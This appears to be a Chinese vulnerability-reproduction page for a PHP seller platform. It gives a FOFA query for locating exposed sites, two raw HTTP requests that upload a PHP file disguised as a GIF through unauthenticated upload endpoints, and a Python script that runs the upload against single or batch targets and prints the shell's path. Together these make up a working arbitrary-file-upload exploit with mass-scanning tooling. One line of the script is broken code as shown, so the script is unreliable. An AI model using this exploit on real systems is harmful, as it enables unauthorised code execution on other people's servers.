漏洞复现
FOFA语句
"/seller.php?s=/Public/login"
POC1
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
POC2
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 214
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
脚本
import requests
import time
import re
import argparse
import urllib3
import base64
# CLI: either one target (-u) or a file of targets (-f), one URL per line.
parser = argparse.ArgumentParser(description='This is the help!')
parser.add_argument('-u','--url', help='单个检测',default='')
parser.add_argument('-f','--file', help='多个检测',default='')
# Silences urllib3's InsecureRequestWarning; poc() below calls requests with verify=False.
urllib3.disable_warnings()
args = parser.parse_args()
# ASCII-art banner printed at startup; its last line repeats the FOFA query from the top of the page.
name = '''
_____ _ _ _
/ ____| | (_) (_)
| (___ | |__ _ _____ _ _ _ _
___ | '_ | |_ / | | | | | | |
____) | | | | |/ /| | |_| | |_| |
|_____/|_| |_|_/___|_|__, |__,_|
__/ |
|___/
FOFA语法:"/seller.php?s=/Public/login"
'''
print(name)
def poc(url):
# Checks a single target: POSTs the POC2 multipart body to the wxapp.php upload
# controller and prints the stored path returned in the JSON response.
# Defender view: a ".php" filename being accepted here means the server-side
# extension/MIME allow-list is missing; the mitigation is to allow-list
# extensions and content server-side and keep uploads outside the web root.
# Detection hooks visible in this request: the controller path, a multipart
# part whose filename ends in .php with Content-Type image/gif, and "Origin: null".
target = url+"/wxapp.php?controller=Goods.doPageUpload"
headers = {
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
# Boundary must match the one inside the base64 body below.
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs',
'Origin': 'null',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
# base64 of a multipart body mirroring POC2 above (field "upfile", a .php
# filename, Content-Type image/gif); decoded right before sending.
payload ='''
Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeThVYUFObVdBZ000QnFCU3MKQ29udGVudC1EaXNwb3Np
dGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGZpbGUiOyBmaWxlbmFtZT0iVGVzdC5waHAiCkNvbnRl
bnQtVHlwZTogaW1hZ2UvZ2lmCgo8P3BocCBlY2hvKCdUZXN0Jyk7Pz4KLS0tLS0tV2ViS2l0Rm9y
bUJvdW5kYXJ5OFVhQU5tV0FnTTRCcUJTcy0tCgk=
'''
print("-"*60)
try:
# verify=False: TLS certificate errors are ignored (warning suppressed at module level).
r = requests.post(url=target,headers=headers,data=base64.decodebytes(payload.encode('utf-8')).decode(),timeout=8,verify=False)
# Expects JSON containing "image_o":"<path>"; when absent, match is None and
# the subscript below raises TypeError, which the bare except swallows.
match = re.search(r'"image_o":"(.*?)",',r.text,re.I|re.M)
s = match[1]
# presumably meant to strip JSON's escaped slashes from the returned path — TODO confirm
s = s.replace('\','')
print("正在检测:"+url)
print("上传成功请访问:"+s)
except:
# Bare except: timeouts, connection errors, a missing match and decode
# errors are all reported as the same "bad input" message.
print("输入有误!")
print("-"*60)
def more(file):
# Runs poc() on every line of `file` (stripped of surrounding whitespace).
# A blank line is passed through as url='' and ends up in poc()'s except branch.
# The handle is never closed explicitly; it is left to interpreter cleanup.
f = open(file,'r')
for i in f.readlines():
i = i.strip()
poc(i)
# Separator between targets (prints the literal string "n", not a newline).
print("n")
if __name__ == '__main__':
# Exactly one of -u / -f is honoured; when both or neither are given
# neither branch matches and the script exits without a usage message.
if args.url !="" and args.file =="" :
poc(args.url)
if args.url =="" and args.file !="" :
more(args.file)